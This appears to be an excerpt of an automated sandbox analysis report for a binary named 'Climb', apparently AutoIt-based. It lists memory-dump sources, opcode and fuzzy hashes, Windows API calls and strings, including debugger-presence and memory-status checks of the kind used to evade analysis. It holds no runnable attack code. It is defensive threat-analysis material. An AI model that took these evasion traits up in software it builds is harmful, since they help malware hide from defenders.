                                                                                                                                                                          • Instruction ID: c18222ca0037aacbf6aa4bceeabb60e74edd5049442c2f20fe994cb5c5b63bf6
                                                                                                                                                                          • Opcode Fuzzy Hash: 1bb38090a8db83c9d0fa29ac3e06fea901ad4522de81f649b14ae1cad6c3b507
                                                                                                                                                                          • Instruction Fuzzy Hash: 21517961E083818EC7617715CD013AA2BE8AB50B80F30CD9AF0995A3E9EF35CDD59B56
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: #
                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                          • Opcode ID: 0e1d203186964dc5ce4ac410d8d7ce7e74ec9bce4056775976ba29b91b1065b3
                                                                                                                                                                          • Instruction ID: 8829ba51a76a221f011078c590cc672136271f58834e99abf27b194504e3c2de
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1d203186964dc5ce4ac410d8d7ce7e74ec9bce4056775976ba29b91b1065b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6051FF3160824A9FCB25DF28C881BFE7BA0EF16314F654059E8D2DB2D1DB749D82CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 000CF6DB
                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 000CF6F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                          • Opcode ID: 6af478af1dce3cca83429bf1345c9a5519d89d90b9d325a43bc5c3724e3d3071
                                                                                                                                                                          • Instruction ID: b1c3eca720466ffa320de183a98f9e3496472e7f72001a2493c6c6f7568607f1
                                                                                                                                                                          • Opcode Fuzzy Hash: 6af478af1dce3cca83429bf1345c9a5519d89d90b9d325a43bc5c3724e3d3071
                                                                                                                                                                          • Instruction Fuzzy Hash: 745139719087489BD320AF10DC86BEBB7ECFB84300F81885DF1D9521A2EB708569CB66
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                          • String ID: CALLARGARRAY
                                                                                                                                                                          • API String ID: 157775604-1150593374
                                                                                                                                                                          • Opcode ID: d70042b8a8e222fd526283bc1e3da2c95e243147663892ab623d2e7ef0682bd8
                                                                                                                                                                          • Instruction ID: b3a8a0127ad3c0bb766a5eff25c46bfd9ca8e0895118e5f024ab910ff2ea1450
                                                                                                                                                                          • Opcode Fuzzy Hash: d70042b8a8e222fd526283bc1e3da2c95e243147663892ab623d2e7ef0682bd8
                                                                                                                                                                          • Instruction Fuzzy Hash: 2341B071E00219AFCB04DFA8C8859FEBBB5FF69364F118029F416A7252E7709D81CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0012DB75
                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0012DB7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                          • String ID: |
                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                          • Opcode ID: 1ba149233171a96fbcb516d8ce6dbf19498609d991bf10b43ff75c72077fcf13
                                                                                                                                                                          • Instruction ID: 7448f6a6bb1481f8f2ed198e296bfc6d5cfab1ba63f456d8c3a960f994823f4c
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ba149233171a96fbcb516d8ce6dbf19498609d991bf10b43ff75c72077fcf13
                                                                                                                                                                          • Instruction Fuzzy Hash: FA317E71C01219ABCF05DFA0DC95EEEBFB9FF14304F104029F815A6262EB719A26CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 001440BD
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001440F8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                          • Opcode ID: 98a8c52e79090de104b59c0a120d6a1a55afe1adf11bf8ee23ed672d6fd393c3
                                                                                                                                                                          • Instruction ID: 89ac85967edae76a0216d5587e139ca27796436307aa71421589a9bf69c0f6fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 98a8c52e79090de104b59c0a120d6a1a55afe1adf11bf8ee23ed672d6fd393c3
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F318B71510604ABDB249F68CC80BFB73A9FF48724F008619FAA9871A1DB71AC91CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 001450BD
                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001450D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: '
                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                          • Opcode ID: d4bb69f78c53428eafe9f479929d3fea4e122af28d239450832f98fd2473e4fd
                                                                                                                                                                          • Instruction ID: 35156c5cce4d797e432bedd2cbacd27c2ed5d012fc27a92c3183bdb8150fb60c
                                                                                                                                                                          • Opcode Fuzzy Hash: d4bb69f78c53428eafe9f479929d3fea4e122af28d239450832f98fd2473e4fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 84310A78A0171A9FDB14CF69C980BDE7BB6FF49304F10416AE904AB362D771A945CF90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000B78B1
                                                                                                                                                                            • Part of subcall function 000B7873: GetStockObject.GDI32(00000011), ref: 000B78C5
                                                                                                                                                                            • Part of subcall function 000B7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B78CF
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00144216
                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 00144230
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                          • Opcode ID: c96abf7a803d6c8547e30767fe7f26be6a1110605db2bd895fcd3dbb7e1d7bbc
                                                                                                                                                                          • Instruction ID: d0f9d9ec85121358c9de452a7aa49a76851e567f200fa54836aed10caf006fda
                                                                                                                                                                          • Opcode Fuzzy Hash: c96abf7a803d6c8547e30767fe7f26be6a1110605db2bd895fcd3dbb7e1d7bbc
                                                                                                                                                                          • Instruction Fuzzy Hash: D611F676610209AFDF01DFA8DC45EEE7BF8EB09314F014524F955E3260D775E8519B60
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0012D7C2
                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0012D7EB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                          • Opcode ID: a16a7b23a6f94535348df2f55452499897dce76ceedeecd2baec3f902205042d
                                                                                                                                                                          • Instruction ID: 0cd21b269e8e906113cbc693bf07f18414d92f4010af44d858525d74023e8ade
                                                                                                                                                                          • Opcode Fuzzy Hash: a16a7b23a6f94535348df2f55452499897dce76ceedeecd2baec3f902205042d
                                                                                                                                                                          • Instruction Fuzzy Hash: AF11C6711452327AD7384B66FC45EF7BE5DEB127ACF10422AF54992180D7689850D6F0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 0011761D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00117629
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                          • Opcode ID: fd99374bb6aa365274d632fb339e0bb2b5b15b6cf18aed8ff5f9c31fe84daf29
                                                                                                                                                                          • Instruction ID: b85a1bd5d8d3969d2db399cc14bc9e1b43b293f8bf7769b58a516314d6b942a5
                                                                                                                                                                          • Opcode Fuzzy Hash: fd99374bb6aa365274d632fb339e0bb2b5b15b6cf18aed8ff5f9c31fe84daf29
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F01C032A18A2A8BEB28AEBDDC519FF73B5AB607907410534F425D23D5FB35D980C650
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00112699
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 86d0771f85f95a200b30e4c0c27a600d0133f8cae45a61a4eb328231d59a1c51
                                                                                                                                                                          • Instruction ID: da9ed9473cf2d2e1276af35e5a2b2b0c962ec81394d4647ef30bcec1ca05de65
                                                                                                                                                                          • Opcode Fuzzy Hash: 86d0771f85f95a200b30e4c0c27a600d0133f8cae45a61a4eb328231d59a1c51
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B01D475600218ABCB0CEBA4CC51CFE77B8EF56750B000629F872972D2EB71595DC651
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00112593
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 4b8bf39bc4b640cf898ac8be1fb3b8c768ae9d449abbd2bfa277f525ac873c40
                                                                                                                                                                          • Instruction ID: a7e2fee60d71deec28be2d08ead4b9b726d66d6751ee08e43d4f62ff1dd38d29
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b8bf39bc4b640cf898ac8be1fb3b8c768ae9d449abbd2bfa277f525ac873c40
                                                                                                                                                                          • Instruction Fuzzy Hash: 5101A775740108ABCB0CE790C962DFE77A9DF56740F500039B812A3282DB649E4986B2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00112615
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 15ead336cf471481d1efff18e44b6fca225172f71a51f82161293dcf066f36a3
                                                                                                                                                                          • Instruction ID: 3efba15bfd2d6a52f8f414c1550d83411cee554436c7d13c9acd428428aaf007
                                                                                                                                                                          • Opcode Fuzzy Hash: 15ead336cf471481d1efff18e44b6fca225172f71a51f82161293dcf066f36a3
                                                                                                                                                                          • Instruction Fuzzy Hash: E901D675B4010867CB09E7A0D951EFF77B89F16740F500035B802A32C2DB658E59D6B2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00112720
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: d0f4c76ecf2eadebcbf42294ca92d90a6a76e04c2fd3235c32eaf08f2b55c03e
                                                                                                                                                                          • Instruction ID: 77ddd01d477acf9018bdb125338333fac09fb724b83ba1af8a513cf4cbe5d6e8
                                                                                                                                                                          • Opcode Fuzzy Hash: d0f4c76ecf2eadebcbf42294ca92d90a6a76e04c2fd3235c32eaf08f2b55c03e
                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0A475B40218A7CB0CE7A48C51FFF77B8AF16750F400925F462A32C2EBB5594CC261
                                                                                                                                                                          APIs
                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0011146F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message
                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                          • Opcode ID: 2580218c8ecfd88c6a0c309961c60171987d2390c648be7a7f395a25b3cfbf16
                                                                                                                                                                          • Instruction ID: 69e1caa47841b2446e20c61c9fa387ced207c5ed23a92dbbe1dbdfc3af9e5dd7
                                                                                                                                                                          • Opcode Fuzzy Hash: 2580218c8ecfd88c6a0c309961c60171987d2390c648be7a7f395a25b3cfbf16
                                                                                                                                                                          • Instruction Fuzzy Hash: ECE048363847143AD6143794BC07FD5B6848F05B55F15882BF74C655D34FE3249042A9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000CFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000D10E2,?,?,?,000B100A), ref: 000CFAD9
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,000B100A), ref: 000D10E6
                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000B100A), ref: 000D10F5
                                                                                                                                                                          Strings
                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000D10F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                          • Opcode ID: 5a6f0208f9e26254cb6d78b8ebe28ea057148c44e81b6cc09ee163d7d20b94ff
                                                                                                                                                                          • Instruction ID: 94f4e71c590e677354ee47dc49247b5d6245055a696ad8fb866564f0332f90d1
